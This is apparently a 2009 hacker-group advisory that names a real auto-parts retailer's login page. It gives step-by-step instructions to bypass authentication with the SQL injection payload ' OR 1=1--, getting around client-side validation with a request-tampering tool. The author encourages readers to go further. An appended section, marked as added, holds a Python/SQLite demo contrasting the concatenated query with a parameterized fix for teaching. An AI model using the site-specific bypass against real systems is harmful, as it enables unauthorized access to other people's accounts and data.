==============================================================
===================[¦¦¦¦TeamQuarantine¦¦¦¦]===================
===================[¦¦¦¦ 2009 ¦¦¦¦]===================
============[¦¦¦¦TeamQuarantine@hushmail.com¦¦¦¦]=============
===================[¦¦¦¦ Author: Gm0 ¦¦¦¦]===================
==============================================================
==============[¦¦¦¦ autopartswarehouse.com ¦¦¦¦]==============
========[¦¦¦¦ SQL Injection Authentication bypass ¦¦¦¦]=======
==============================================================
==============================================================

A Side Note: I don't usually post site-specific exploits, but due to the fact that they have IGNORED all of our attempts to explain this issue to them, I feel they would learn best if more people showed them what a problem this could be. Be nice... ;)

==============================================================
======================[¦¦¦¦ USAGE: ¦¦¦¦]======================
==============================================================

Vulnerable: https://www.autopartswarehouse.com/myaccount/login/

1) Fire up your favorite HTTP/HTTPS POST/header editor (Tamper Data).

2) The login form checks the email-address format client-side only. Either submit a well-formed email address and any password and tamper with the request in flight, or modify the client-side validation with Firebug so it accepts "improper" email-address formatting.

3) Set both the 'username' and 'password' parameter values to:

   ' OR 1=1--

   The leading quote closes the string literal in the login query, OR 1=1 makes the WHERE clause true for every row, and -- comments out the rest of the statement. (Simple, I know, which is why they should be informed.)

4) Submit the modified request.

5) Click the 'edit profile' link for proof of logged-in status (https://www.autopartswarehouse.com/myaccount/edit_profile/).

==============================================================
====================[¦¦¦¦ FINAL WORD ¦¦¦¦]====================
==============================================================

I _KNOW_ more can be done with this. Explore, learn, have fun. (Be responsible.)

Maybe now they will take notice . . .
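The following is an added example, not part of the original advisory and not code from autopartswarehouse.com, whose back end is unknown. It reproduces the bug class the USAGE section describes against a constructed in-memory SQLite table: a login query built by string concatenation, which the ' OR 1=1-- payload turns into a query that matches every user, next to the parameterized form of the same query, which treats the payload as an ordinary (non-matching) email address. The table contents, the user names and the function names are invented for illustration; a real system would store password hashes, not plaintext.

```python
import sqlite3

PAYLOAD = "' OR 1=1--"  # the payload from the USAGE section


def build_db():
    """Constructed sample user table (not real site data, plaintext for illustration only)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, email TEXT, password TEXT)"
    )
    conn.executemany(
        "INSERT INTO users (email, password) VALUES (?, ?)",
        [("alice@example.com", "hunter2"), ("bob@example.com", "s3cret")],
    )
    return conn


def login_vulnerable(conn, username, password):
    """Login check built by concatenating user input into the SQL text.

    With username = "' OR 1=1--" the query becomes
      SELECT id, email FROM users WHERE email = '' OR 1=1--' AND password = '...'
    so the quote closes the literal, OR 1=1 matches every row and -- discards
    the password check. The first row (alice) is returned and the caller
    treats that as a successful login.
    """
    query = (
        "SELECT id, email FROM users WHERE email = '"
        + username
        + "' AND password = '"
        + password
        + "'"
    )
    row = conn.execute(query).fetchone()
    return row[1] if row else None


def login_hardened(conn, username, password):
    """Same check with bound parameters: input is data, never parsed as SQL."""
    row = conn.execute(
        "SELECT id, email FROM users WHERE email = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row[1] if row else None


if __name__ == "__main__":
    db = build_db()
    print("vulnerable, payload in both fields:", login_vulnerable(db, PAYLOAD, PAYLOAD))
    print("vulnerable, payload in username only:", login_vulnerable(db, PAYLOAD, "x"))
    print("hardened, payload in both fields:", login_hardened(db, PAYLOAD, PAYLOAD))
    print("hardened, real credentials:", login_hardened(db, "alice@example.com", "hunter2"))
```

Note that the payload in the 'username' field alone is enough against the concatenated query, since the -- comment removes the password comparison entirely; the advisory's instruction to set both fields is belt and braces. The hardened version also shows why client-side email validation (step 2 above) is no defence: the fix has to be in how the query is built, not in what the browser lets through.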
==============================================================
======================[¦¦¦¦ SHOUTZ ¦¦¦¦]======================
==============================================================

Everyone at TeamQuarantine, including _YOU_ A.G. But certainly not J.L. HA!